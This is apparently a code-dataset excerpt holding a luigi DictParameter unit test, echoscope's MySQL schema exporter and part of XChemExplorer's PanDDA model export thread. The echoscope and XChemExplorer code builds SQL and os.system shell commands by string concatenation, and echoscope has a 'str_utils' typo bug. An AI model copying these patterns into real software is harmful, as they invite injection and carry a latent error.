'zipfile.ZipFile', 'zipfile.ZipFile', ({(72, 25, 72, 33): 'filename', (72, 35, 72, 38): '"""w"""', (72, 40, 72, 60): 'zipfile.ZIP_DEFLATED'}, {}), "(filename, 'w', zipfile.ZIP_DEFLATED)", False, 'import zipfile\n'), ((73, 20, 73, 48), 'os.path.normpath', 'os.path.normpath', ({(73, 37, 73, 47): 'source_dir'}, {}), '(source_dir)', False, 'import os\n'), ((74, 44, 74, 63), 'os.walk', 'os.walk', ({(74, 52, 74, 62): 'source_dir'}, {}), '(source_dir)', False, 'import os\n'), ((59, 37, 59, 124), 'os.path.join', 'os.path.join', ({(59, 50, 59, 58): 'unzipdir', (59, 60, 59, 70): '"""binaries"""', (59, 72, 59, 80): 'platform', (59, 82, 59, 123): '(model_identifier + sharedLibraryExtension)'}, {}), "(unzipdir, 'binaries', platform, model_identifier +\n sharedLibraryExtension)", False, 'import os\n'), ((80, 19, 80, 39), 'os.path.isfile', 'os.path.isfile', ({(80, 34, 80, 38): 'path'}, {}), '(path)', False, 'import os\n'), ((76, 40, 76, 67), 'os.path.join', 'os.path.join', ({(76, 53, 76, 60): 'dirpath', (76, 62, 76, 66): 'name'}, {}), '(dirpath, name)', False, 'import os\n'), ((77, 31, 77, 63), 'os.path.relpath', 'os.path.relpath', ({(77, 47, 77, 51): 'path', (77, 53, 77, 62): 'base_path'}, {}), '(path, base_path)', False, 'import os\n'), ((79, 40, 79, 67), 'os.path.join', 'os.path.join', ({(79, 53, 79, 60): 'dirpath', (79, 62, 79, 66): 'name'}, {}), '(dirpath, name)', False, 'import os\n'), ((81, 35, 81, 67), 'os.path.relpath', 'os.path.relpath', ({(81, 51, 81, 55): 'path', (81, 57, 81, 66): 'base_path'}, {}), '(path, base_path)', False, 'import os\n')] |
shouldsee/luigi | test/dict_parameter_test.py | 54a347361ae1031f06105eaf30ff88f5ef65b00c | # -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from helpers import unittest, in_parse
import luigi
import luigi.interface
import json
import collections
class DictParameterTask(luigi.Task):
param = luigi.DictParameter()
class DictParameterTest(unittest.TestCase):
_dict = collections.OrderedDict([('username', 'me'), ('password', 'secret')])
def test_parse(self):
d = luigi.DictParameter().parse(json.dumps(DictParameterTest._dict))
self.assertEqual(d, DictParameterTest._dict)
def test_serialize(self):
d = luigi.DictParameter().serialize(DictParameterTest._dict)
self.assertEqual(d, '{"username": "me", "password": "secret"}')
def test_parse_and_serialize(self):
inputs = ['{"username": "me", "password": "secret"}', '{"password": "secret", "username": "me"}']
for json_input in inputs:
_dict = luigi.DictParameter().parse(json_input)
self.assertEqual(json_input, luigi.DictParameter().serialize(_dict))
def test_parse_interface(self):
in_parse(["DictParameterTask", "--param", '{"username": "me", "password": "secret"}'],
lambda task: self.assertEqual(task.param, DictParameterTest._dict))
def test_serialize_task(self):
t = DictParameterTask(DictParameterTest._dict)
self.assertEqual(str(t), 'DictParameterTask(param={"username": "me", "password": "secret"})')
def test_parse_invalid_input(self):
self.assertRaises(ValueError, lambda: luigi.DictParameter().parse('{"invalid"}'))
def test_hash_normalize(self):
self.assertRaises(TypeError, lambda: hash(luigi.DictParameter().parse('{"a": {"b": []}}')))
a = luigi.DictParameter().normalize({"a": [{"b": []}]})
b = luigi.DictParameter().normalize({"a": [{"b": []}]})
self.assertEqual(hash(a), hash(b))
| [((27, 12, 27, 33), 'luigi.DictParameter', 'luigi.DictParameter', ({}, {}), '()', False, 'import luigi\n'), ((32, 12, 32, 81), 'collections.OrderedDict', 'collections.OrderedDict', ({(32, 36, 32, 80): "[('username', 'me'), ('password', 'secret')]"}, {}), "([('username', 'me'), ('password', 'secret')])", False, 'import collections\n'), ((35, 40, 35, 75), 'json.dumps', 'json.dumps', ({(35, 51, 35, 74): 'DictParameterTest._dict'}, {}), '(DictParameterTest._dict)', False, 'import json\n'), ((35, 12, 35, 33), 'luigi.DictParameter', 'luigi.DictParameter', ({}, {}), '()', False, 'import luigi\n'), ((39, 12, 39, 33), 'luigi.DictParameter', 'luigi.DictParameter', ({}, {}), '()', False, 'import luigi\n'), ((61, 12, 61, 33), 'luigi.DictParameter', 'luigi.DictParameter', ({}, {}), '()', False, 'import luigi\n'), ((62, 12, 62, 33), 'luigi.DictParameter', 'luigi.DictParameter', ({}, {}), '()', False, 'import luigi\n'), ((45, 20, 45, 41), 'luigi.DictParameter', 'luigi.DictParameter', ({}, {}), '()', False, 'import luigi\n'), ((46, 41, 46, 62), 'luigi.DictParameter', 'luigi.DictParameter', ({}, {}), '()', False, 'import luigi\n'), ((57, 46, 57, 67), 'luigi.DictParameter', 'luigi.DictParameter', ({}, {}), '()', False, 'import luigi\n'), ((60, 50, 60, 71), 'luigi.DictParameter', 'luigi.DictParameter', ({}, {}), '()', False, 'import luigi\n')] |
treeyh/echoscope | echoscope/source/mysql_source.py | ef8933ce9a5dfe2ac8fb6e82bad8d5fa0d72a6da | # -*- coding: UTF-8 -*-
import logging
from typing import List
from echoscope.config import config
from echoscope.util import mysql_util, str_util, log_util
from echoscope.model import ds_model, config_model
from echoscope.source import source
class MysqlSource(source.Source):
def __init__(self):
self.excludesDb = ['information_schema', 'performance_schema', 'mysql', 'sys', 'test']
def export_model(self, conf: config_model.DataSourceConfig) -> ds_model.DataSourceModel:
mysqlUtil = mysql_util.get_mysql_util(
host=conf.host, port=conf.port, user=conf.user, passwd=conf.passwd, db=conf.db, charset=conf.charset)
ver = self.get_db_version(mysqlUtil)
if ver == '':
logging.error(' mysql conn fail. ')
return
dsm = ds_model.DataSourceModel(
name='%s:%d' % (conf.host, conf.port), dbType=config.DsMysql, version=ver)
dsm.dbs = self.get_export_dbs(mysqlUtil, conf.includes, conf.excludes)
dsm = self.fill_table_fields(mysqlUtil, dsm)
return dsm
def get_db_version(self, conn: mysql_util.MysqlUtil) -> str:
"""获取mysql版本
Args:
conn (mysql_util.MysqlUtil): [description]
Returns:
str: [description]
"""
sql = 'select version() as ver from dual'
cols = ['ver']
ver = conn.find_one(sql, (), cols)
return '' if ver == None else str_util.format_bytes_to_str(ver.get('ver', ''))
def get_export_dbs(self, conn: mysql_util.MysqlUtil, includes: List[str] = [], excludes: List[str] = []) -> List[ds_model.DbModel]:
"""获取需要导出结构的数据库列表
Args:
conn (mysql_util.MysqlUtil): 数据库连接
includes (List[str], optional): 需要包含的数据库列表. Defaults to [].
excludes (List[str], optional): 需要排除的数据库列表. Defaults to [].
Returns:
List[ds_model.DbModel]: 需要导出的数据库列表
"""
sql = 'select SCHEMA_NAME AS db_name, DEFAULT_CHARACTER_SET_NAME as charset, DEFAULT_COLLATION_NAME as collation_name from `information_schema`.SCHEMATA '
cols = ['db_name', 'charset', 'collation_name']
data = conn.find_all(sql, (), cols)
dbs = []
for d in data:
db_name = str_util.format_bytes_to_str(d['db_name'])
if db_name in self.excludesDb or db_name in excludes:
# 需要过滤
continue
if len(includes) > 0 and db_name not in includes:
# 不包含在include中
continue
charset = str_util.format_bytes_to_str(d['charset'])
collation_name = str_util.format_bytes_to_str(d['collation_name'])
dbModel = ds_model.DbModel(
name=db_name, charset=charset, collation_name=collation_name)
dbs.append(dbModel)
return dbs
def fill_table_fields(self, conn: mysql_util.MysqlUtil, dsModel: ds_model.DataSourceModel) -> ds_model.DataSourceModel:
"""获取数据库中的表信息
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dsModel (ds_model.DataSourceModel): 数据源,包含数据库列表
Returns:
ds_model.DataSourceModel: 数据源
"""
sql = ''' select TABLE_NAME, `ENGINE`, TABLE_COLLATION, TABLE_COMMENT from information_schema.`TABLES` where TABLE_SCHEMA = %s and TABLE_TYPE = 'BASE TABLE' '''
cols = ['TABLE_NAME', 'ENGINE', 'TABLE_COLLATION', 'TABLE_COMMENT']
for db in dsModel.dbs:
data = conn.find_all(sql, (db.name, ), cols)
tables: ds_model.TableModel = []
for d in data:
tableName = str_util.format_bytes_to_str(d['TABLE_NAME'])
comment = str_util.format_bytes_to_str(d['TABLE_COMMENT'])
collation_name = str_util.format_bytes_to_str(d['TABLE_COLLATION'])
engine = str_util.format_bytes_to_str(d['ENGINE'])
table = ds_model.TableModel(
name=tableName, comment=comment, collation_name=collation_name, engine=engine)
logging.info('load table:%s fields.' % tableName)
table.fields = self.get_fields(conn, db.name, tableName)
table.create_script = self.get_create_script(conn, db.name, tableName)
tables.append(table)
db.tables = tables
return dsModel
def get_create_script(self, conn: mysql_util.MysqlUtil, dbName: str, tableName: str) -> str:
"""获取表的创建脚本
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dbName (str): 数据库名称
tableName (str): 表名称
Returns:
str: 创建脚本
"""
sql = ''' SHOW CREATE TABLE `%s`.`%s` ''' % (dbName, tableName)
cols = ['Table', 'Create Table']
data = conn.find_one(sql, (), cols)
return '' if data == None else str_util.format_bytes_to_str(data.get('Create Table', ''))
def get_fields(self, conn: mysql_util.MysqlUtil, dbName: str, tableName: str) -> List[ds_model.FieldModel]:
"""获取数据表中列信息
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dbName (str): 数据库名
tableName (str): 表名
Returns:
List[ds_model.FieldModel]: 列列表
"""
sql = ''' select TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME, ORDINAL_POSITION, COLUMN_DEFAULT, IS_NULLABLE, DATA_TYPE, CHARACTER_MAXIMUM_LENGTH, NUMERIC_PRECISION, NUMERIC_SCALE, CHARACTER_SET_NAME, COLLATION_NAME, COLUMN_TYPE, COLUMN_KEY, EXTRA, COLUMN_COMMENT from information_schema.`columns` where TABLE_SCHEMA = %s and TABLE_NAME = %s ORDER BY TABLE_SCHEMA DESC, TABLE_NAME DESC, ORDINAL_POSITION ASC '''
cols = ['TABLE_SCHEMA', 'TABLE_NAME', 'COLUMN_NAME', 'ORDINAL_POSITION', 'COLUMN_DEFAULT',
'IS_NULLABLE', 'DATA_TYPE', 'CHARACTER_MAXIMUM_LENGTH', 'NUMERIC_PRECISION', 'NUMERIC_SCALE',
'CHARACTER_SET_NAME', 'COLLATION_NAME', 'COLUMN_TYPE', 'COLUMN_KEY', 'EXTRA', 'COLUMN_COMMENT']
data = conn.find_all(sql, (dbName, tableName, ), cols)
fields = []
for d in data:
fname = str_util.format_bytes_to_str(d['COLUMN_NAME'])
ftype = str_util.format_bytes_to_str(d['DATA_TYPE'])
column_type = str_utils.format_bytes_to_str(d['COLUMN_TYPE'])
length = str_util.format_bytes_to_str(
d['CHARACTER_MAXIMUM_LENGTH']) if d['CHARACTER_MAXIMUM_LENGTH'] != None else str_util.format_bytes_to_str(d['NUMERIC_PRECISION'])
scale = str_util.format_bytes_to_str(d['NUMERIC_SCALE'])
# on update CURRENT_TIMESTAMP
default = str_util.format_bytes_to_str(d['COLUMN_DEFAULT'])
ext = str_util.format_bytes_to_str(d['EXTRA'])
if default == 'CURRENT_TIMESTAMP':
if 'on update CURRENT_TIMESTAMP' in ext:
default = 'update_time'
else:
default = 'create_time'
nullFlag = str_util.format_bytes_to_str(d['IS_NULLABLE'])
comment = str_util.format_bytes_to_str(d['COLUMN_COMMENT'])
charset = str_util.format_bytes_to_str(d['CHARACTER_SET_NAME'])
collation_name = str_util.format_bytes_to_str(d['COLLATION_NAME'])
indexFlag = 0
column_key = str_util.format_bytes_to_str(d['COLUMN_KEY'])
if column_key == 'PRI':
indexFlag = 1
elif column_key == 'UNI':
indexFlag = 3
elif column_key == 'MUL':
indexFlag = 2
indexName = ''
autoInc = False
if 'auto_increment' in ext:
autoInc = True
field = ds_model.FieldModel(name=fname, ftype=ftype, length=length, scale=scale, default=default, nullFlag=nullFlag,
comment=comment, charset=charset, collation_name=collation_name, indexFlag=indexFlag, indexName=indexName, autoInc=autoInc)
fields.append(field)
return fields
| [((18, 16, 19, 109), 'echoscope.util.mysql_util.get_mysql_util', 'mysql_util.get_mysql_util', (), '', False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((25, 10, 26, 82), 'echoscope.model.ds_model.DataSourceModel', 'ds_model.DataSourceModel', (), '', False, 'from echoscope.model import ds_model, config_model\n'), ((23, 6, 23, 41), 'logging.error', 'logging.error', ({(23, 20, 23, 40): '""" mysql conn fail. """'}, {}), "(' mysql conn fail. ')", False, 'import logging\n'), ((66, 16, 66, 58), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(66, 45, 66, 57): "d['db_name']"}, {}), "(d['db_name'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((74, 16, 74, 58), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(74, 45, 74, 57): "d['charset']"}, {}), "(d['charset'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((75, 23, 75, 72), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(75, 52, 75, 71): "d['collation_name']"}, {}), "(d['collation_name'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((76, 16, 77, 71), 'echoscope.model.ds_model.DbModel', 'ds_model.DbModel', (), '', False, 'from echoscope.model import ds_model, config_model\n'), ((149, 14, 149, 60), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(149, 43, 149, 59): "d['COLUMN_NAME']"}, {}), "(d['COLUMN_NAME'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((150, 14, 150, 58), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(150, 43, 150, 57): "d['DATA_TYPE']"}, {}), "(d['DATA_TYPE'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((154, 14, 154, 62), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(154, 43, 154, 61): "d['NUMERIC_SCALE']"}, {}), "(d['NUMERIC_SCALE'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((156, 16, 156, 65), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(156, 45, 156, 64): "d['COLUMN_DEFAULT']"}, {}), "(d['COLUMN_DEFAULT'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((157, 12, 157, 52), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(157, 41, 157, 51): "d['EXTRA']"}, {}), "(d['EXTRA'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((163, 17, 163, 63), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(163, 46, 163, 62): "d['IS_NULLABLE']"}, {}), "(d['IS_NULLABLE'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((164, 16, 164, 65), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(164, 45, 164, 64): "d['COLUMN_COMMENT']"}, {}), "(d['COLUMN_COMMENT'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((165, 16, 165, 69), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(165, 45, 165, 68): "d['CHARACTER_SET_NAME']"}, {}), "(d['CHARACTER_SET_NAME'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((166, 23, 166, 72), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(166, 52, 166, 71): "d['COLLATION_NAME']"}, {}), "(d['COLLATION_NAME'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((168, 19, 168, 64), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(168, 48, 168, 63): "d['COLUMN_KEY']"}, {}), "(d['COLUMN_KEY'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((180, 14, 181, 157), 'echoscope.model.ds_model.FieldModel', 'ds_model.FieldModel', (), '', False, 'from echoscope.model import ds_model, config_model\n'), ((99, 20, 99, 65), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(99, 49, 99, 64): "d['TABLE_NAME']"}, {}), "(d['TABLE_NAME'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((100, 18, 100, 66), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(100, 47, 100, 65): "d['TABLE_COMMENT']"}, {}), "(d['TABLE_COMMENT'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((101, 25, 101, 75), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(101, 54, 101, 74): "d['TABLE_COLLATION']"}, {}), "(d['TABLE_COLLATION'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((102, 17, 102, 58), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(102, 46, 102, 57): "d['ENGINE']"}, {}), "(d['ENGINE'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((103, 16, 104, 90), 'echoscope.model.ds_model.TableModel', 'ds_model.TableModel', (), '', False, 'from echoscope.model import ds_model, config_model\n'), ((105, 8, 105, 57), 'logging.info', 'logging.info', ({(105, 21, 105, 56): "('load table:%s fields.' % tableName)"}, {}), "('load table:%s fields.' % tableName)", False, 'import logging\n'), ((152, 15, 153, 40), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(153, 10, 153, 39): "d['CHARACTER_MAXIMUM_LENGTH']"}, {}), "(d['CHARACTER_MAXIMUM_LENGTH'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((153, 87, 153, 139), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(153, 116, 153, 138): "d['NUMERIC_PRECISION']"}, {}), "(d['NUMERIC_PRECISION'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n')] |
graeme-winter/XChemExplorer | lib/XChemPANDDA.py | 7b0779387705ab37074d80f77baf22891eb56907 | # last edited: 10/08/2017, 10:25
import os, sys, glob, subprocess
from datetime import datetime
from PyQt4 import QtGui, QtCore
import math
#from XChemUtils import mtztools
import XChemDB
import XChemRefine
import XChemUtils
import XChemLog
import XChemToolTips
import csv
try:
import gemmi
import pandas
except ImportError:
pass
#def get_names_of_current_clusters(xce_logfile,panddas_directory):
# Logfile=XChemLog.updateLog(xce_logfile)
# Logfile.insert('parsing {0!s}/cluster_analysis'.format(panddas_directory))
# os.chdir('{0!s}/cluster_analysis'.format(panddas_directory))
# cluster_dict={}
# for out_dir in sorted(glob.glob('*')):
# if os.path.isdir(out_dir):
# cluster_dict[out_dir]=[]
# found_first_pdb=False
# for folder in glob.glob(os.path.join(out_dir,'pdbs','*')):
# xtal=folder[folder.rfind('/')+1:]
# if not found_first_pdb:
# if os.path.isfile(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb') ):
# cluster_dict[out_dir].append(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb'))
# found_first_pdb=True
# cluster_dict[out_dir].append(xtal)
# return cluster_dict
class export_and_refine_ligand_bound_models(QtCore.QThread):
def __init__(self,PanDDA_directory,datasource,project_directory,xce_logfile,which_models):
QtCore.QThread.__init__(self)
self.PanDDA_directory = PanDDA_directory
self.datasource = datasource
self.db = XChemDB.data_source(self.datasource)
self.Logfile = XChemLog.updateLog(xce_logfile)
self.xce_logfile = xce_logfile
self.project_directory = project_directory
self.which_models=which_models
self.external_software=XChemUtils.external_software(xce_logfile).check()
# self.initial_model_directory=initial_model_directory
# self.db.create_missing_columns()
# self.db_list=self.db.get_empty_db_dict()
# self.external_software=XChemUtils.external_software(xce_logfile).check()
# self.xce_logfile=xce_logfile
# self.already_exported_models=[]
def run(self):
self.Logfile.warning(XChemToolTips.pandda_export_ligand_bound_models_only_disclaimer())
# find all folders with *-pandda-model.pdb
modelsDict = self.find_modeled_structures_and_timestamps()
# if only NEW models shall be exported, check timestamps
if not self.which_models.startswith('all'):
modelsDict = self.find_new_models(modelsDict)
# find pandda_inspect_events.csv and read in as pandas dataframe
inspect_csv = None
if os.path.isfile(os.path.join(self.PanDDA_directory,'analyses','pandda_inspect_events.csv')):
inspect_csv = pandas.read_csv(os.path.join(self.PanDDA_directory,'analyses','pandda_inspect_events.csv'))
progress = 0
try:
progress_step = float(1/len(modelsDict))
except TypeError:
self.Logfile.error('DID NOT FIND ANY MODELS TO EXPORT')
return None
for xtal in sorted(modelsDict):
os.chdir(os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
pandda_model = os.path.join('modelled_structures',xtal + '-pandda-model.pdb')
pdb = gemmi.read_structure(pandda_model)
# find out ligand event map relationship
ligandDict = XChemUtils.pdbtools_gemmi(pandda_model).center_of_mass_ligand_dict('LIG')
if ligandDict == {}:
self.Logfile.error(xtal + ': cannot find ligand of type LIG; skipping...')
continue
self.show_ligands_in_model(xtal,ligandDict)
emapLigandDict = self.find_ligands_matching_event_map(inspect_csv,xtal,ligandDict)
self.Logfile.warning('emapLigandDict' + str(emapLigandDict))
# convert event map to SF
self.event_map_to_sf(pdb.resolution,emapLigandDict)
# move existing event maps in project directory to old folder
self.move_old_event_to_backup_folder(xtal)
# copy event MTZ to project directory
self.copy_event_mtz_to_project_directory(xtal)
# copy pandda-model to project directory
self.copy_pandda_model_to_project_directory(xtal)
# make map from MTZ and cut around ligand
self.make_and_cut_map(xtal,emapLigandDict)
# update database
self.update_database(xtal,modelsDict)
# refine models
self.refine_exported_model(xtal)
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
def update_database(self,xtal,modelsDict):
db_dict = {}
timestamp_file = modelsDict[xtal]
db_dict['DatePanDDAModelCreated'] = timestamp_file
db_dict['RefinementOutcome'] = '3 - In Refinement'
self.Logfile.insert('updating database for '+xtal+' setting time model was created to '+db_dict['DatePanDDAModelCreated'])
self.db.update_data_source(xtal,db_dict)
def make_and_cut_map(self,xtal,emapLigandDict):
self.Logfile.insert('changing directory to ' + os.path.join(self.project_directory,xtal))
os.chdir(os.path.join(self.project_directory,xtal))
XChemUtils.pdbtools_gemmi(xtal + '-pandda-model.pdb').save_ligands_to_pdb('LIG')
for ligID in emapLigandDict:
m = emapLigandDict[ligID]
emtz = m.replace('.ccp4','_' + ligID + '.mtz')
emap = m.replace('.ccp4','_' + ligID + '.ccp4')
XChemUtils.maptools().calculate_map(emtz,'FWT','PHWT')
XChemUtils.maptools().cut_map_around_ligand(emap,ligID+'.pdb','7')
if os.path.isfile(emap.replace('.ccp4','_mapmask.ccp4')):
os.system('/bin/mv %s %s_%s_event.ccp4' %(emap.replace('.ccp4','_mapmask.ccp4'),xtal,ligID))
os.system('ln -s %s_%s_event.ccp4 %s_%s_event_cut.ccp4' %(xtal,ligID,xtal,ligID))
def copy_pandda_model_to_project_directory(self,xtal):
os.chdir(os.path.join(self.project_directory,xtal))
model = os.path.join(self.PanDDA_directory,'processed_datasets',xtal,'modelled_structures',xtal+'-pandda-model.pdb')
self.Logfile.insert('copying %s to project directory' %model)
os.system('/bin/cp %s .' %model)
def copy_event_mtz_to_project_directory(self,xtal):
self.Logfile.insert('changing directory to ' + os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
os.chdir(os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
for emap in glob.glob('*-BDC_*.mtz'):
self.Logfile.insert('copying %s to %s...' %(emap,os.path.join(self.project_directory,xtal)))
os.system('/bin/cp %s %s' %(emap,os.path.join(self.project_directory,xtal)))
def move_old_event_to_backup_folder(self,xtal):
self.Logfile.insert('changing directory to ' + os.path.join(self.project_directory,xtal))
os.chdir(os.path.join(self.project_directory,xtal))
if not os.path.isdir('event_map_backup'):
os.mkdir('event_map_backup')
self.Logfile.insert('moving existing event maps to event_map_backup')
for emap in glob.glob('*-BDC_*.ccp4'):
os.system('/bin/mv %s event_map_backup/%s' %(emap,emap+'.'+str(datetime.now()).replace(' ','_').replace(':','-')))
def show_ligands_in_model(self,xtal,ligandDict):
self.Logfile.insert(xtal + ': found the following ligands...')
for lig in ligandDict:
self.Logfile.insert(lig + ' -> coordinates ' + str(ligandDict[lig]))
def find_modeled_structures_and_timestamps(self):
self.Logfile.insert('finding out modelled structures in ' + self.PanDDA_directory)
modelsDict={}
for model in sorted(glob.glob(os.path.join(self.PanDDA_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb'))):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
modelsDict[sample]=timestamp
return modelsDict
def find_new_models(self,modelsDict):
samples_to_export = {}
self.Logfile.hint('XCE will never export/ refine models that are "5-deposition ready" or "6-deposited"')
self.Logfile.hint('Please change the RefinementOutcome flag in the Refinement table if you wish to re-export them')
self.Logfile.insert('checking timestamps of models in database...')
for xtal in modelsDict:
timestamp_file = modelsDict[xtal]
db_query=self.db.execute_statement("select DatePanDDAModelCreated from mainTable where CrystalName is '"+xtal+"' and (RefinementOutcome like '3%' or RefinementOutcome like '4%')")
try:
timestamp_db=str(db_query[0][0])
except IndexError:
self.Logfile.warning('%s: database query gave no results for DatePanDDAModelCreated; skipping...' %xtal)
self.Logfile.warning('%s: this might be a brand new model; will continue with export!' %xtal)
samples_to_export[xtal]=timestamp_file
timestamp_db = "2100-01-01 00:00:00" # some time in the future...
try:
difference=(datetime.strptime(timestamp_file,'%Y-%m-%d %H:%M:%S') - datetime.strptime(timestamp_db,'%Y-%m-%d %H:%M:%S') )
if difference.seconds != 0:
self.Logfile.insert('exporting '+xtal+' -> was already refined, but newer PanDDA model available')
samples_to_export[xtal]=timestamp_file
else:
self.Logfile.insert('%s: model has not changed since it was created on %s' %(xtal,timestamp_db))
except (ValueError, IndexError), e:
self.Logfile.error(str(e))
return samples_to_export
def event_map_to_sf(self,resolution,emapLigandDict):
for lig in emapLigandDict:
emap = emapLigandDict[lig]
emtz = emap.replace('.ccp4','.mtz')
emtz_ligand = emap.replace('.ccp4','_' + lig + '.mtz')
self.Logfile.insert('trying to convert %s to SF -> %s' %(emap,emtz_ligand))
self.Logfile.insert('>>> ' + emtz)
XChemUtils.maptools_gemmi(emap).map_to_sf(resolution)
if os.path.isfile(emtz):
os.system('/bin/mv %s %s' %(emtz,emtz_ligand))
self.Logfile.insert('success; %s exists' %emtz_ligand)
else:
self.Logfile.warning('something went wrong; %s could not be created...' %emtz_ligand)
def find_ligands_matching_event_map(self,inspect_csv,xtal,ligandDict):
emapLigandDict = {}
for index, row in inspect_csv.iterrows():
if row['dtag'] == xtal:
for emap in glob.glob('*-BDC_*.ccp4'):
self.Logfile.insert('checking if event and ligand are within 7A of each other')
x = float(row['x'])
y = float(row['y'])
z = float(row['z'])
matching_ligand = self.calculate_distance_to_ligands(ligandDict,x,y,z)
if matching_ligand is not None:
emapLigandDict[matching_ligand] = emap
self.Logfile.insert('found matching ligand (%s) for %s' %(matching_ligand,emap))
break
else:
self.Logfile.warning('current ligand not close to event...')
if emapLigandDict == {}:
self.Logfile.error('could not find ligands within 7A of PanDDA events')
return emapLigandDict
def calculate_distance_to_ligands(self,ligandDict,x,y,z):
matching_ligand = None
p_event = gemmi.Position(x, y, z)
for ligand in ligandDict:
c = ligandDict[ligand]
p_ligand = gemmi.Position(c[0], c[1], c[2])
self.Logfile.insert('coordinates ligand: ' + str(c[0])+' '+ str(c[1])+' '+str(c[2]))
self.Logfile.insert('coordinates event: ' + str(x)+' '+ str(y)+' '+str(z))
distance = p_event.dist(p_ligand)
self.Logfile.insert('distance between ligand and event: %s A' %str(distance))
if distance < 7:
matching_ligand = ligand
break
return matching_ligand
def refine_exported_model(self,xtal):
RefmacParams={ 'HKLIN': '', 'HKLOUT': '',
'XYZIN': '', 'XYZOUT': '',
'LIBIN': '', 'LIBOUT': '',
'TLSIN': '', 'TLSOUT': '',
'TLSADD': '',
'NCYCLES': '10',
'MATRIX_WEIGHT': 'AUTO',
'BREF': ' bref ISOT\n',
'TLS': '',
'NCS': '',
'TWIN': '',
'WATER': '',
'LIGOCC': '',
'SANITY': '' }
if 'nocheck' in self.which_models:
RefmacParams['SANITY'] = 'off'
self.Logfile.insert('trying to refine ' + xtal + '...')
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
self.Logfile.insert('%s: compounds code = %s' %(xtal,compoundID))
if os.path.isfile(os.path.join(self.project_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.project_directory,xtal,xtal+'-pandda-model.pdb')):
self.Logfile.insert('running inital refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.project_directory,xtal)
if not os.path.isdir(os.path.join(self.project_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.project_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
else:
os.mkdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.system('/bin/cp %s in.pdb' %os.path.join(self.project_directory,xtal,xtal+'-pandda-model.pdb'))
